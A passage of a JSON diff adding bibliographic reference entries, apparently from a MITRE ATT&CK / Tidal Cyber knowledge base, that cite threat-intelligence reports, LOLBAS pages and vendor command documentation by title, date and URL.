"Foundation" + }, + "related": [], + "uuid": "ea194268-0a8f-4494-be09-ef5f679f68fe", + "value": "macOS Foundation" + }, + { + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform. Retrieved August 7, 2020.", + "meta": { + "date_accessed": "2020-08-07T00:00:00Z", + "date_published": "2020-07-27T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/" + ], + "source": "MITRE", + "title": "Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform" + }, + "related": [], + "uuid": "489c52a2-34cc-47ff-b42b-9d48f83b9e90", + "value": "SentinelOne Lazarus macOS July 2020" + }, + { + "description": "Department of Justice. (2022, March 24). Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide. Retrieved April 5, 2022.", + "meta": { + "date_accessed": "2022-04-05T00:00:00Z", + "date_published": "2022-03-24T00:00:00Z", + "refs": [ + "https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical" + ], + "source": "MITRE", + "title": "Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide" + }, + "related": [], + "uuid": "768a0ec6-b767-4044-acad-82834508640f", + "value": "DOJ Russia Targeting Critical Infrastructure March 2022" + }, + { + "description": "ClearSky. (2020, February 16). Fox Kitten – Widespread Iranian Espionage-Offensive Campaign. Retrieved December 21, 2020.", + "meta": { + "date_accessed": "2020-12-21T00:00:00Z", + "date_published": "2020-02-16T00:00:00Z", + "refs": [ + "https://www.clearskysec.com/fox-kitten/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Fox Kitten – Widespread Iranian Espionage-Offensive Campaign" + }, + "related": [], + "uuid": "a5ad6321-897a-4adc-9cdd-034a2538e3d6", + "value": "ClearkSky Fox Kitten February 2020" + }, + { + "description": "FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019.", + "meta": { + "date_accessed": "2019-04-18T00:00:00Z", + "date_published": "2012-09-17T00:00:00Z", + "refs": [ + "https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf" + ], + "source": "MITRE", + "title": "Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud" + }, + "related": [], + "uuid": "9c8772eb-6d1d-4742-a2db-a5e1006effaa", + "value": "FSISAC FraudNetDoS September 2012" + }, + { + "description": "Segura, J. (2020, February 26). Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server. Retrieved September 15, 2020.", + "meta": { + "date_accessed": "2020-09-15T00:00:00Z", + "date_published": "2020-02-26T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2020/02/fraudsters-cloak-credit-card-skimmer-with-fake-content-delivery-network-ngrok-server/" + ], + "source": "MITRE", + "title": "Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server" + }, + "related": [], + "uuid": "531206c7-11ec-46bf-a35c-0464244a58c9", + "value": "MalwareBytes Ngrok February 2020" + }, + { + "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.", + "meta": { + "date_accessed": "2020-06-15T00:00:00Z", + "date_published": "2020-05-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf" + ], + "source": "MITRE", + "title": "From Agent.btz to ComRAT v4: A ten-year journey" + }, + "related": [], + "uuid": "cd9043b8-4d14-449b-a6b2-2e9b99103bb0", + "value": "ESET ComRAT May 2020" + }, + { + "description": "Sean Metcalf. (2020, May 27). From Azure AD to Active Directory (via Azure) – An Unanticipated Attack Path. Retrieved September 28, 2022.", + "meta": { + "date_accessed": "2022-09-28T00:00:00Z", + "date_published": "2020-05-27T00:00:00Z", + "refs": [ + "https://adsecurity.org/?p=4277" + ], + "source": "MITRE", + "title": "From Azure AD to Active Directory (via Azure) – An Unanticipated Attack Path" + }, + "related": [], + "uuid": "087d07a9-0d33-4253-b7c1-d55be13c0467", + "value": "Azure AD to AD" + }, + { + "description": "Pereira, T. Huey, C. (2022, March 17). From BlackMatter to BlackCat: Analyzing two attacks from one affiliate. Retrieved May 5, 2022.", + "meta": { + "date_accessed": "2022-05-05T00:00:00Z", + "date_published": "2022-03-17T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html" + ], + "source": "MITRE", + "title": "From BlackMatter to BlackCat: Analyzing two attacks from one affiliate" + }, + "related": [], + "uuid": "605b58ea-9544-49b8-b3c8-0a97b2b155dc", + "value": "blackmatter_blackcat" + }, + { + "description": "Samantha Stallings, Brad Duncan. (2023, December 29). From DarkGate to AsyncRAT: Malware Detected and Shared As Unit 42 Timely Threat Intelligence. Retrieved January 11, 2024.", + "meta": { + "date_accessed": "2024-01-11T00:00:00Z", + "date_published": "2023-12-29T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-threat-intelligence-roundup/" + ], + "source": "Tidal Cyber", + "title": "From DarkGate to AsyncRAT: Malware Detected and Shared As Unit 42 Timely Threat Intelligence" + }, + "related": [], + "uuid": "a18e19b5-9046-4c2c-bd94-2cd5061064bf", + "value": "Unit42 Malware Roundup December 29 2023" + }, + { + "description": "Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "date_published": "2017-12-16T00:00:00Z", + "refs": [ + "https://reaqta.com/2017/12/mavinject-microsoft-injector/" + ], + "source": "MITRE", + "title": "From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector" + }, + "related": [], + "uuid": "5c0e0c84-2992-4098-8913-66a20ca61bf4", + "value": "Reaqta Mavinject" + }, + { + "description": "Del Fierro, C. Kessem, L.. (2020, January 8). From Mega to Giga: Cross-Version Comparison of Top MegaCortex Modifications. Retrieved February 15, 2021.", + "meta": { + "date_accessed": "2021-02-15T00:00:00Z", + "date_published": "2020-01-08T00:00:00Z", + "refs": [ + "https://securityintelligence.com/posts/from-mega-to-giga-cross-version-comparison-of-top-megacortex-modifications/" + ], + "source": "MITRE", + "title": "From Mega to Giga: Cross-Version Comparison of Top MegaCortex Modifications" + }, + "related": [], + "uuid": "3d70d9b7-88e4-411e-a59a-bc862da965a7", + "value": "IBM MegaCortex" + }, + { + "description": "BI.ZONE Cyber Threats Research Team. (2021, May 13). From pentest to APT attack: cybercriminal group FIN7 disguises its malware as an ethical hacker’s toolkit. Retrieved February 2, 2022.", + "meta": { + "date_accessed": "2022-02-02T00:00:00Z", + "date_published": "2021-05-13T00:00:00Z", + "refs": [ + "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319" + ], + "source": "MITRE", + "title": "From pentest to APT attack: cybercriminal group FIN7 disguises its malware as an ethical hacker’s toolkit" + }, + "related": [], + "uuid": "315f47e1-69e5-4dcb-94b2-59583e91dd26", + "value": "BiZone Lizar May 2021" + }, + { + "description": "Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.", + "meta": { + "date_accessed": "2019-03-14T00:00:00Z", + "date_published": "2017-03-07T00:00:00Z", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf" + ], + "source": "MITRE", + "title": "From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond" + }, + "related": [], + "uuid": "e2637cb3-c449-4609-af7b-ac78a900cc8b", + "value": "Kaspersky StoneDrill 2017" + }, + { + "description": "LOLBAS. (2021, September 26). FsiAnyCpu.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-09-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/" + ], + "source": "Tidal Cyber", + "title": "FsiAnyCpu.exe" + }, + "related": [], + "uuid": "87031d31-b6d7-4860-b11b-5a0dc8774d92", + "value": "FsiAnyCpu.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2021, September 26). Fsi.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-09-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/" + ], + "source": "Tidal Cyber", + "title": "Fsi.exe" + }, + "related": [], + "uuid": "4e14e87f-2ad9-4959-8cb2-8585b67931c0", + "value": "Fsi.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (2021, September 27). fsutil behavior. Retrieved January 14, 2022.", + "meta": { + "date_accessed": "2022-01-14T00:00:00Z", + "date_published": "2021-09-27T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior" + ], + "source": "MITRE", + "title": "fsutil behavior" + }, + "related": [], + "uuid": "07712696-b1fd-4704-b157-9e420840fb2c", + "value": "fsutil_behavior" + }, + { + "description": "LOLBAS. (2021, August 16). Fsutil.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-08-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Fsutil/" + ], + "source": "Tidal Cyber", + "title": "Fsutil.exe" + }, + "related": [], + "uuid": "e2305dac-4245-4fac-8813-69cb210e9cd3", + "value": "Fsutil.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (2021, July 21). ftp. Retrieved February 25, 2022.", + "meta": { + "date_accessed": "2022-02-25T00:00:00Z", + "date_published": "2021-07-21T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ftp" + ], + "source": "MITRE", + "title": "ftp" + }, + "related": [], + "uuid": "970f8d16-f5b7-44e2-b81f-738b931c60d9", + "value": "Microsoft FTP" + }, + { + "description": "N/A. (n.d.). ftp(1) - Linux man page. Retrieved February 25, 2022.", + "meta": { + "date_accessed": "2022-02-25T00:00:00Z", + "refs": [ + "https://linux.die.net/man/1/ftp" + ], + "source": "MITRE", + "title": "ftp(1) - Linux man page" + }, + "related": [], + "uuid": "021ea6bc-abff-48de-a6bb-315dbbfa6147", + "value": "Linux FTP" + }, + { + "description": "LOLBAS. (2018, December 10). Ftp.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-12-10T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ftp/" + ], + "source": "Tidal Cyber", + "title": "Ftp.exe" + }, + "related": [], + "uuid": "3b51993d-6062-4138-bfc6-a2c0fc5d039a", + "value": "Ftp.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (2008, September 11). Fun with WMI Filters in Group Policy. Retrieved March 13, 2019.", + "meta": { + "date_accessed": "2019-03-13T00:00:00Z", + "date_published": "2008-09-11T00:00:00Z", + "refs": [ + "https://blogs.technet.microsoft.com/askds/2008/09/11/fun-with-wmi-filters-in-group-policy/" + ], + "source": "MITRE", + "title": "Fun with WMI Filters in Group Policy" + }, + "related": [], + "uuid": "2894c3bf-6f8d-4338-8206-4dc873e3bb8d", + "value": "Microsoft WMI Filters" + }, + { + "description": "NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.", + "meta": { + "date_accessed": "2021-07-29T00:00:00Z", + "date_published": "2021-05-07T00:00:00Z", + "refs": [ + "https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf" + ], + "source": "MITRE", + "title": "Further TTPs associated with SVR cyber actors" + }, + "related": [], + "uuid": "e18c1b56-f29d-4ea9-a425-a6af8ac6a347", + "value": "Cybersecurity Advisory SVR TTP May 2021" + }, + { + "description": "Klijnsma, Y.. (2017, November 28). Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions. Retrieved October 10, 2018.", + "meta": { + "date_accessed": "2018-10-10T00:00:00Z", + "date_published": "2017-11-28T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/" + ], + "source": "MITRE", + "title": "Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions" + }, + "related": [], + "uuid": "ebf961c5-bd68-42f3-8fd3-000946c7ae9c", + "value": "RiskIQ Cobalt Nov 2017" + }, + { + "description": "Unit 42. (2022, June 13). GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool. Retrieved August 7, 2022.", + "meta": { + "date_accessed": "2022-08-07T00:00:00Z", + "date_published": "2022-06-13T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/pingpull-gallium/" + ], + "source": "MITRE", + "title": "GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool" + }, + "related": [], + "uuid": "ac6491ab-6ef1-4091-8a15-50e2cbafe157", + "value": "Unit 42 PingPull Jun 2022" + }, + { + "description": "MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021.", + "meta": { + "date_accessed": "2021-01-13T00:00:00Z", + "date_published": "2019-12-12T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/" + ], + "source": "MITRE, Tidal Cyber", + "title": "GALLIUM: Targeting global telecom" + }, + "related": [], + "uuid": "5bc76b47-ff68-4031-a347-f2dc0daba203", + "value": "Microsoft GALLIUM December 2019" + }, + { + "description": "Symantec Security Response. (2018, October 10). Gallmaker: New Attack Group Eschews Malware to Live off the Land. Retrieved November 27, 2018.", + "meta": { + "date_accessed": "2018-11-27T00:00:00Z", + "date_published": "2018-10-10T00:00:00Z", + "refs": [ + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group" + ], + "source": "MITRE, Tidal Cyber", + "title": "Gallmaker: New Attack Group Eschews Malware to Live off the Land" + }, + "related": [], + "uuid": "f47b3e2b-acdd-4487-88b9-de5cbe45cf33", + "value": "Symantec Gallmaker Oct 2018" + }, + { + "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.", + "meta": { + "date_accessed": "2020-05-19T00:00:00Z", + "date_published": "2020-04-17T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/" + ], + "source": "MITRE", + "title": "Gamaredon APT Group Use Covid-19 Lure in Campaigns" + }, + "related": [], + "uuid": "3800cfc2-0260-4b36-b629-7a336b9f9f10", + "value": "TrendMicro Gamaredon April 2020" + }, + { + "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.", + "meta": { + "date_accessed": "2020-06-16T00:00:00Z", + "date_published": "2020-06-11T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/" + ], + "source": "MITRE", + "title": "Gamaredon group grows its game" + }, + "related": [], + "uuid": "6532664d-2311-4b38-8960-f43762471729", + "value": "ESET Gamaredon June 2020" + }, + { + "description": "CERT-EE. (2021, January 27). Gamaredon Infection: From Dropper to Entry. Retrieved February 17, 2022.", + "meta": { + "date_accessed": "2022-02-17T00:00:00Z", + "date_published": "2021-01-27T00:00:00Z", + "refs": [ + "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf" + ], + "source": "MITRE", + "title": "Gamaredon Infection: From Dropper to Entry" + }, + "related": [], + "uuid": "fec320ed-29c1-40db-ad2e-701fda428922", + "value": "CERT-EE Gamaredon January 2021" + }, + { + "description": "Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016.", + "meta": { + "date_accessed": "2016-01-14T00:00:00Z", + "date_published": "2015-06-22T00:00:00Z", + "refs": [ + "https://securelist.com/games-are-over/70991/" + ], + "source": "MITRE", + "title": "Games are over: Winnti is now targeting pharmaceutical companies" + }, + "related": [], + "uuid": "86504950-0f4f-42bc-b003-24f60ae97c99", + "value": "Kaspersky Winnti June 2015" + }, + { + "description": "Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.", + "meta": { + "date_accessed": "2017-12-16T00:00:00Z", + "date_published": "2013-03-19T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/" + ], + "source": "MITRE", + "title": "Gapz and Redyms droppers based on Power Loader code" + }, + "related": [], + "uuid": "b8d328b7-2eb3-4851-8d44-2e1bad7710c2", + "value": "WeLiveSecurity Gapz and Redyms Mar 2013" + }, + { + "description": "Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "date_published": "2021-06-29T00:00:00Z", + "refs": [ + "https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/" + ], + "source": "MITRE", + "title": "GateKeeper - Not a Bypass (Again)" + }, + "related": [], + "uuid": "d00f373d-2133-47c3-9b0a-104ecc9a6869", + "value": "theevilbit gatekeeper bypass 2021" + }, + { + "description": "Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution. Retrieved January 17, 2019.", + "meta": { + "date_accessed": "2019-01-17T00:00:00Z", + "date_published": "2012-08-01T00:00:00Z", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf" + ], + "source": "MITRE", + "title": "Gauss: Abnormal Distribution" + }, + "related": [], + "uuid": "4bf39390-f3ca-4132-841e-b35abefe7dee", + "value": "Kaspersky Gauss Whitepaper" + }, + { + "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020.", + "meta": { + "date_accessed": "2020-05-13T00:00:00Z", + "date_published": "2019-04-10T00:00:00Z", + "refs": [ + "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/" + ], + "source": "MITRE", + "title": "Gaza Cybergang Group1, operation SneakyPastes" + }, + "related": [], + "uuid": "38216a34-5ffd-4e79-80b1-7270743b728e", + "value": "Kaspersky MoleRATs April 2019" + }, + { + "description": "ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.", + "meta": { + "date_accessed": "2017-09-14T00:00:00Z", + "date_published": "2017-08-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf" + ], + "source": "MITRE", + "title": "Gazing at Gazer: Turla’s new second stage backdoor" + }, + "related": [], + "uuid": "9d1c40af-d4bc-4d4a-b667-a17378942685", + "value": "ESET Gazer Aug 2017" + }, + { + "description": "Kessler, G. (2022, December 9). GCK'S FILE SIGNATURES TABLE. Retrieved August 23, 2022.", + "meta": { + "date_accessed": "2022-08-23T00:00:00Z", + "date_published": "2022-12-09T00:00:00Z", + "refs": [ + "https://www.garykessler.net/library/file_sigs.html" + ], + "source": "MITRE", + "title": "GCK'S FILE SIGNATURES TABLE" + }, + "related": [], + "uuid": "4bc3a8af-d0c1-514d-9edd-dcebb3344db8", + "value": "file_sig_table" + }, + { + "description": "Google Cloud. (2022, March 31). gcloud compute instances add-metadata. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "date_published": "2022-03-31T00:00:00Z", + "refs": [ + "https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata" + ], + "source": "MITRE", + "title": "gcloud compute instances add-metadata" + }, + "related": [], + "uuid": "eba4b850-8784-4da2-b87d-54b5bd0f58d6", + "value": "Google Cloud Add Metadata" + }, + { + "description": "Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020.", + "meta": { + "date_accessed": "2020-05-26T00:00:00Z", + "refs": [ + "https://cloud.google.com/sdk/gcloud/reference/compute/instances/list" + ], + "source": "MITRE", + "title": "gcloud compute instances list" + }, + "related": [], + "uuid": "ae09e791-a00c-487b-b0e5-7768df0679a3", + "value": "Google Compute Instances" + }, + { + "description": "Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020.", + "meta": { + "date_accessed": "2020-10-01T00:00:00Z", + "refs": [ + "https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add" + ], + "source": "MITRE", + "title": "gcloud compute os-login ssh-keys add" + }, + "related": [], + "uuid": "372b6cfd-abdc-41b7-be78-4b1dc0426044", + "value": "GCP SSH Key Add" + }, + { + "description": "Google. (2020, June 23). gcloud iam service-accounts list. Retrieved August 4, 2020.", + "meta": { + "date_accessed": "2020-08-04T00:00:00Z", + "date_published": "2020-06-23T00:00:00Z", + "refs": [ + "https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list" + ], + "source": "MITRE", + "title": "gcloud iam service-accounts list" + }, + "related": [], + "uuid": "3ffad706-1dac-41dd-b197-06f22fec3b30", + "value": "Google Cloud - IAM Servie Accounts List API" + }, + { + "description": "Dupuy, T. and Faou, M. (2021, June). Gelsemium. Retrieved November 30, 2021.", + "meta": { + "date_accessed": "2021-11-30T00:00:00Z", + "date_published": "2021-06-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf" + ], + "source": "MITRE", + "title": "Gelsemium" + }, + "related": [], + "uuid": "ea28cf8c-8c92-48cb-b499-ffb7ff0e3cf5", + "value": "ESET Gelsemium June 2021" + }, + { + "description": "Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.", + "meta": { + "date_accessed": "2017-12-12T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/dd315590.aspx" + ], + "source": "MITRE", + "title": "General Task Registration" + }, + "related": [], + "uuid": "344703ac-f67c-465b-8c56-c9617675a00b", + "value": "TechNet Scheduled Task Events" + }, + { + "description": "Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019.", + "meta": { + "date_accessed": "2019-01-18T00:00:00Z", + "date_published": "2016-10-28T00:00:00Z", + "refs": [ + "https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf" + ], + "source": "MITRE", + "title": "Genetic Malware: Designing Payloads for Specific Targets" + }, + "related": [], + "uuid": "8c65dbc1-33ad-470c-b172-7497c6fd2480", + "value": "Ebowla: Genetic Malware" + }, + { + "description": "Proofpoint. (2020, December 2). Geofenced NetWire Campaigns. Retrieved January 7, 2021.", + "meta": { + "date_accessed": "2021-01-07T00:00:00Z", + "date_published": "2020-12-02T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/blog/threat-insight/geofenced-netwire-campaigns" + ], + "source": "MITRE", + "title": "Geofenced NetWire Campaigns" + }, + "related": [], + "uuid": "5a974fc5-31bb-44b5-9834-ef98175402ec", + "value": "Proofpoint NETWIRE December 2020" + }, + { + "description": "Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.", + "meta": { + "date_accessed": "2018-10-13T00:00:00Z", + "date_published": "2002-08-01T00:00:00Z", + "refs": [ + "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631" + ], + "source": "MITRE", + "title": "Get a handle on cd00r: The invisible backdoor" + }, + "related": [], + "uuid": "739e6517-10f5-484d-8000-8818d63e7341", + "value": "Hartrell cd00r 2002" + }, + { + "description": "The Kubernetes Authors. (n.d.). Get a Shell to a Running Container. Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/" + ], + "source": "MITRE", + "title": "Get a Shell to a Running Container" + }, + "related": [], + "uuid": "ffb9c0ca-533f-4911-8c0c-a2653410a76d", + "value": "Kubectl Exec Get Shell" + }, + { + "description": "Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6, 2019.", + "meta": { + "date_accessed": "2019-10-06T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist" + ], + "source": "MITRE", + "title": "Get-GlobalAddressList" + }, + "related": [], + "uuid": "a4948a80-d11c-44ed-ae63-e3f5660463f9", + "value": "Microsoft getglobaladdresslist" + }, + { + "description": "Satiro, J. (2011, September 14). GetHooks. Retrieved December 12, 2017.", + "meta": { + "date_accessed": "2017-12-12T00:00:00Z", + "date_published": "2011-09-14T00:00:00Z", + "refs": [ + "https://github.com/jay/gethooks" + ], + "source": "MITRE", + "title": "GetHooks" + }, + "related": [], + "uuid": "228ac239-3a97-446f-8e1c-d5c0f580710c", + "value": "Jay GetHooks Sept 2011" + }, + { + "description": "Microsoft. (n.d.). Get-InboxRule. Retrieved June 10, 2021.", + "meta": { + "date_accessed": "2021-06-10T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/get-inboxrule?view=exchange-ps" + ], + "source": "MITRE", + "title": "Get-InboxRule" + }, + "related": [], + "uuid": "c6a1b00c-22d4-407a-a515-fbce5c197606", + "value": "Microsoft Get-InboxRule" + }, + { + "description": "Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019.", + "meta": { + "date_accessed": "2019-10-06T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0" + ], + "source": "MITRE", + "title": "Get-MsolRole" + }, + "related": [], + "uuid": "e36f4e3a-61c9-4fdc-98de-d51a2b3b4865", + "value": "Microsoft Msolrole" + }, + { + "description": "Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.", + "meta": { + "date_accessed": "2019-10-06T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0" + ], + "source": "MITRE", + "title": "Get-MsolRoleMember" + }, + "related": [], + "uuid": "ca28494c-d834-4afc-9237-ab78dcfc427b", + "value": "Microsoft msolrolemember" + }, + { + "description": "Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021.", + "meta": { + "date_accessed": "2021-10-15T00:00:00Z", + "date_published": "2019-07-25T00:00:00Z", + "refs": [ + "https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/" + ], + "source": "MITRE", + "title": "Getting an Attacker IP Address from a Malicious Linux At Job" + }, + "related": [], + "uuid": "85056eba-c587-4619-b5e4-dff9680be7b3", + "value": "rowland linux at 2019" + }, + { + "description": "Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved March 6, 2017.", + "meta": { + "date_accessed": "2017-03-06T00:00:00Z", + "date_published": "2010-01-01T00:00:00Z", + "refs": [ + "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + ], + "source": "MITRE", + "title": "“Getting In Bed with Robin Sage.”" + }, + "related": [], + "uuid": "82068e93-a3f8-4d05-9358-6fe76a0055bb", + "value": "BlackHatRobinSage" + }, + { + "description": "Dr. Nestori Syynimaa. (2020, June 4). Getting root access to Azure VMs as a Azure AD Global Administrator. Retrieved March 13, 2023.", + "meta": { + "date_accessed": "2023-03-13T00:00:00Z", + "date_published": "2020-06-04T00:00:00Z", + "refs": [ + "https://aadinternals.com/post/azurevms/" + ], + "source": "MITRE", + "title": "Getting root access to Azure VMs as a Azure AD Global Administrator" + }, + "related": [], + "uuid": "7080ae79-bec4-5886-9a43-6039d0cfd32f", + "value": "AADInternals Root Access to Azure VMs" + }, + { + "description": "Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore Apps. Retrieved March 31, 2021.", + "meta": { + "date_accessed": "2021-03-31T00:00:00Z", + "date_published": "2019-07-02T00:00:00Z", + "refs": [ + "https://objective-see.com/blog/blog_0x46.html" + ], + "source": "MITRE", + "title": "Getting Root with Benign AppStore Apps" + }, + "related": [], + "uuid": "128b4e3f-bb58-45e0-b8d9-bff9fc3ec3df", + "value": "Wardle Dylib Hijack Vulnerable Apps" + }, + { + "description": "Austin, J. (2017, June 6). Getting Started with VBA in Office. Retrieved July 3, 2017.", + "meta": { + "date_accessed": "2017-07-03T00:00:00Z", + "date_published": "2017-06-06T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office" + ], + "source": "MITRE", + "title": "Getting Started with VBA in Office" + }, + "related": [], + "uuid": "9c44416d-1f3d-4d99-b497-4615ed6f5546", + "value": "MSDN VBA in Office" + }, + { + "description": "Viviano, A. (2021, August 17). Getting started with Windows drivers: User mode and kernel mode. Retrieved September 24, 2021.", + "meta": { + "date_accessed": "2021-09-24T00:00:00Z", + "date_published": "2021-08-17T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + "source": "MITRE", + "title": "Getting started with Windows drivers: User mode and kernel mode" + }, + "related": [], + "uuid": "1b93e7ba-6afa-45ff-a9e2-3586cdae822c", + "value": "Windows Getting Started Drivers" + }, + { + "description": "Bloxham, B. (n.d.). Getting Windows to 